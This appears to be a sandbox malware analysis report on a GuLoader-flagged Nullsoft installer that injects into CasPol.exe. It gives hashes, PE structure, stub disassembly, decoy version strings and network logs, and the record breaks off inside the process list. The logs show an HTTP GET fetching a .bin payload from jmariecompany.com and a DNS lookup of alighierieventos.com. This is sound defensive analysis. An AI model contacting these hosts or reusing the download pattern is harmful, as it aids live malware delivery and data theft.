Malicious: false
Preview: .PNG........IHDR................a....sBIT....|.d....zIDAT8..;..0.@.^A........nQ....).....E1..A!....y"..P.\..R.d..Q$..%.,..X.d.x.j. .D`.....Ep....rL8`..sP....d.)....H.k.{.?...5%Zy|N.....IEND.B`.
C:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 12288
Entropy (8bit): 2.8128752827547734
Encrypted: false
SSDEEP: 96:lP2Ei0UR030i0E0U970Cl40k0U950Cl5090U990ClP0qD0U9H0ClgQ09G:tZk1vyIiPyWj6y6hqAyU3w
MD5: 5D7A3D8D2BEB69CF108F85C7F84F339A
SHA1: 1627D890DD5A3CE7FC5FA048840A45CD73F4C5F5
SHA-256: 443AD11610FFC666B82044B7EE96C9AA753C578F2B1D5376C40748B41DD2CE5C
SHA-512: A666B71B8DC7E399E9C1D5B70F0A77BD0C92DB6E62710BA06D09621FC446549C942FC2F4C911429D37DB15753D3AD9C770420C5B9365698946AA76D658DA2484
Malicious: false
Preview: ....................................................!...............................l...........................bJ..........v..Zb....... [email protected].,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1............................................................-Y..v............E..v..........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.6.0.2._.1.5.5.2.0.3._.8.6.1...e.t.l.............P.P.....l.......................................................................8.B.........19041.1.amd64fre.vb_release.191206-1406.....5.@..........u.5.%Nb.f.};......WaaSMedicSvc.pdb....................................................................................................................................................................................................................................
\Device\ConDrv
(Console output written by the injected CasPol.exe, which is why a conhost.exe was spawned under PID 1836; the text is the stealer reporting that no NordVPN profile directory was present to harvest.)
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 30
Entropy (8bit): 3.964735178725505
Encrypted: false
SSDEEP: 3:IBVFBWAGRHneyy:ITqAGRHner
MD5: 9F754B47B351EF0FC32527B541420595
SHA1: 006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256: 0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512: C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious: false
Preview: NordVPN directory not found!..
Static File Info

General
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 6.875472756643268
TrID: Win32 Executable (generic) a (10002005/4) 99.96%; Generic Win/DOS Executable (2004/3) 0.02%; DOS Executable Generic (2002/1) 0.02%; Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ref002062022pago062022.exe
File size: 275627
MD5: 7500c0e8df88d12316724078ffbeefaa
SHA1: 5e20971a917ceb5a29690584f893dc30f284956e
SHA256: a488827429040238f86305283944e1429897f94e4f629cbbbdf8d42d74af1d1a
SHA512: 576fc4e57315c610cac60d7d4c4a3b60d8048ced532bb7142c5e5a0b461a905dce374aa481b123be802a015d5f95658d8469d679c1ec94074d0e87ed00d6904c
SSDEEP: 6144:rbE/HU89oytSQlfP6YFqlMTva8/iEJcd39Y7:rbg9Z1xFqaT5/IdU
TLSH: 5744D052B700D1E7D772CB700C769FA65A69FC2386619E1723803B9F6CB3190DA2B5C5
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon
Icon Hash: e0e8e8e8e0fae2e0

Static PE Info

General
Entrypoint: 0x40352d
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6
DYNAMIC_BASE is set, but RELOCS_STRIPPED is also set and the base relocation directory is empty, so the loader cannot rebase this image; it maps at 0x400000 regardless of ASLR and the flag is cosmetic. The timestamp is that of the Nullsoft stub build, not of the campaign, and the import hash likewise identifies the generic NSIS stub rather than this loader.
Entrypoint Preview
Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F7D8CBB9D7Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F7D8CBB9D4Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx
Reading the listing: the 0x8001 pushed before the first import call is SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX, i.e. a SetErrorMode call, and the structure first sized 0x11C (sizeof OSVERSIONINFOEXA) and retried with 0x114 (sizeof OSVERSIONINFOA) is the GetVersionExA probe. This is the unmodified Nullsoft installer stub prologue, so the entry-point code tells nothing about the loader; its logic lives in the NSIS script and the plugin calls made through the dropped System.dll, and disassembly has to start from the memory dumps, not from here.
Rich Headers
Programming Language: [EXP] VC++ 6.0 SP5 build 8804
Data Directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x59000 | 0x284d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
.text 0x1000 0x6897 0x6a00 False 0.666126179245 data 6.45839821493 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata 0x8000 0x14a6 0x1600 False 0.439275568182 data 5.02410928126 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data 0xa000 0x2b018 0x600 False 0.521484375 data 4.15458210409 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata 0x36000 0x23000 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc 0x59000 0x284d0 0x28600 False 0.555334510449 data 6.08130361493 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name RVA Size Type Language Country
RT_ICON 0x59358 0x10828 dBase III DBT, version number 0, next free block index 40
English United States
RT_ICON 0x69b80 0x94a8 data English United States
RT_ICON 0x73028 0x5488 data English United States
RT_ICON 0x784b0 0x4228 dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 33, next used block 0
English United States
RT_ICON 0x7c6d8 0x25a8 dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
English United States
RT_ICON 0x7ec80 0x10a8 dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
English United States
RT_ICON 0x7fd28 0x988 data English United States
RT_ICON 0x806b0 0x468 GLS_BINARY_LSB_FIRST English United States
RT_DIALOG 0x80b18 0x100 data English United States
RT_DIALOG 0x80c18 0x11c data English United States
RT_DIALOG 0x80d38 0xc4 data English United States
Rich Headers
Data Directories
Sections
Resources
Copyright Joe Security LLC 2022 Page 16 of 26
RT_DIALOG 0x80e00 0x60 data English United States
RT_GROUP_ICON 0x80e60 0x76 data English United States
RT_VERSION 0x80ed8 0x2b4 data English United States
RT_MANIFEST 0x81190 0x33e XML 1.0 document, ASCII text, with very long lines, with no line terminators
English United States
Name RVA Size Type Language Country
Imports
DLL Import
ADVAPI32.dll RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Version Infos
Description Data
LegalCopyright Wyndham International Inc
FileVersion 16.9.22
CompanyName GreenPoint Financial Corp.
LegalTrademarks BorgWarner Inc.
Comments Walgreen Co
ProductName Systemax Inc.
FileDescription Fortinet Inc.
Translation 0x0409 0x04b0
Possible Origin
Language of compilation system Country where language is spoken Map
English United States
Network Behavior
Network Port Distribution
Total Packets: 50
• 53 (DNS)
• 80 (HTTP)
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Jun 2, 2022 16:46:17.339750051 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.522840977 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.523098946 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.523752928 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.697953939 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703290939 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703397989 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703445911 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703491926 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703519106 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703552961 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703568935 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703628063 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703632116 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703651905 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703701973 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703746080 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703756094 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703793049 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703824043 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703871965 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703882933 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.703918934 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.703977108 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.704030991 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888196945 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888259888 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888308048 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888354063 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.888381958 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888425112 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888494015 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.888556957 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889170885 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889271021 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889318943 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889369011 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889372110 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889442921 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889492989 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889511108 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889533997 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889559984 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889616966 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889652967 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889671087 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889715910 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889731884 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889792919 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889832973 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889846087 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889904022 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889908075 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.889955997 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.889971018 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.890027046 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.890028954 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.890080929 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.890093088 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:17.890182018 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:17.890260935 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.101731062 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.101799965 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.101846933 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.101892948 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.102013111 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.102062941 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.102076054 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103296041 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103430986 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103466034 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103528976 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103585958 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103636026 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103684902 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103745937 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103792906 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103802919 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103861094 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103900909 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103916883 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.103949070 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.103991985 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104007006 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104058027 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104095936 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104111910 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104166985 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104167938 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104221106 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104231119 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104269028 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104293108 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104329109 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104350090 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104401112 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104404926 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104449987 CEST 49746 80 192.168.11.20 139.28.232.231
Jun 2, 2022 16:46:18.104464054 CEST 80 49746 139.28.232.231 192.168.11.20
Jun 2, 2022 16:46:18.104497910 CEST 49746 80 192.168.11.20 139.28.232.231
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Jun 2, 2022 16:46:17.313322067 CEST 64547 53 192.168.11.20 1.1.1.1
Jun 2, 2022 16:46:17.329067945 CEST 53 64547 1.1.1.1 192.168.11.20
Jun 2, 2022 16:46:29.524741888 CEST 53471 53 192.168.11.20 1.1.1.1
Jun 2, 2022 16:46:30.537839890 CEST 53471 53 192.168.11.20 9.9.9.9
Jun 2, 2022 16:46:30.541223049 CEST 53 53471 9.9.9.9 192.168.11.20
Jun 2, 2022 16:46:30.963263988 CEST 53 53471 1.1.1.1 192.168.11.20
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Jun 2, 2022 16:46:17.313322067 CEST 192.168.11.20 1.1.1.1 0x2081 Standard query (0) jmariecompany.com A (IP address) IN (0x0001)
Jun 2, 2022 16:46:29.524741888 CEST 192.168.11.20 1.1.1.1 0xa522 Standard query (0) alighierieventos.com A (IP address) IN (0x0001)
Jun 2, 2022 16:46:30.537839890 CEST 192.168.11.20 9.9.9.9 0xa522 Standard query (0) alighierieventos.com A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Jun 2, 2022 16:45:40.144823074 CEST 1.1.1.1 192.168.11.20 0xa3c4 No error (0) www-bing-com.dual-a-0001.a-msedge.net dual-a-0001.a-msedge.net CNAME (Canonical name) IN (0x0001)
Jun 2, 2022 16:45:40.144823074 CEST 1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net 13.107.21.200 A (IP address) IN (0x0001)
Jun 2, 2022 16:45:40.144823074 CEST 1.1.1.1 192.168.11.20 0xa3c4 No error (0) dual-a-0001.a-msedge.net 204.79.197.200 A (IP address) IN (0x0001)
Jun 2, 2022 16:45:40.294567108 CEST 1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi.azure-api.net apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net CNAME (Canonical name) IN (0x0001)
Jun 2, 2022 16:45:40.294567108 CEST 1.1.1.1 192.168.11.20 0x1fe8 No error (0) devcenterapi-eastus-01.regional.azure-api.net apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net CNAME (Canonical name) IN (0x0001)
Jun 2, 2022 16:46:17.329067945 CEST 1.1.1.1 192.168.11.20 0x2081 No error (0) jmariecompany.com 139.28.232.231 A (IP address) IN (0x0001)
Jun 2, 2022 16:46:30.541223049 CEST 9.9.9.9 192.168.11.20 0xa522 Name error (3) alighierieventos.com none none A (IP address) IN (0x0001)
Jun 2, 2022 16:46:30.963263988 CEST 1.1.1.1 192.168.11.20 0xa522 No error (0) alighierieventos.com 50.31.177.39 A (IP address) IN (0x0001)
HTTP Request Dependency Graph
jmariecompany.com
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.11.20 49746 139.28.232.231 80 C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp kBytes transferred Direction Data
Jun 2, 2022 16:46:17.523752928 CEST 469 OUT GET /Buhari0f_XGXisVNVRE198.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: jmariecompany.com
Cache-Control: no-cache
Jun 2, 2022 16:46:17.703290939 CEST
471 IN HTTP/1.1 200 OK
Date: Thu, 02 Jun 2022 14:46:17 GMT
Server: Apache
Last-Modified: Wed, 01 Jun 2022 23:51:39 GMT
Accept-Ranges: bytes
Content-Length: 214592
Content-Type: application/octet-stream
Statistics
Behavior
• ref002062022pago062022.exe
• CasPol.exe
• CasPol.exe
• CasPol.exe
• CasPol.exe
• CasPol.exe
• conhost.exe
• svchost.exe
System Behavior
Analysis Process: ref002062022pago062022.exe PID: 3504, Parent PID: 8512
General
Target ID: 0
Start time: 16:45:47
Start date: 02/06/2022
Path: C:\Users\user\Desktop\ref002062022pago062022.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x400000
File size: 275627 bytes
MD5 hash: 7500C0E8DF88D12316724078FFBEEFAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
File Activities
Registry Activities
Key Path Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Analysis Process: CasPol.exe PID: 1664, Parent PID: 3504
General
Target ID: 3
Start time: 16:46:05
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x3e0000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Analysis Process: CasPol.exe PID: 1740, Parent PID: 3504
General
Target ID: 4
Start time: 16:46:05
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x240000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Analysis Process: CasPol.exe PID: 1900, Parent PID: 3504
General
Target ID: 5
Start time: 16:46:05
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x200000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Analysis Process: CasPol.exe PID: 2172, Parent PID: 3504
General
Target ID: 6
Start time: 16:46:06
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0x300000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Analysis Process: CasPol.exe PID: 1836, Parent PID: 3504
General
Target ID: 7
Start time: 16:46:06
Start date: 02/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
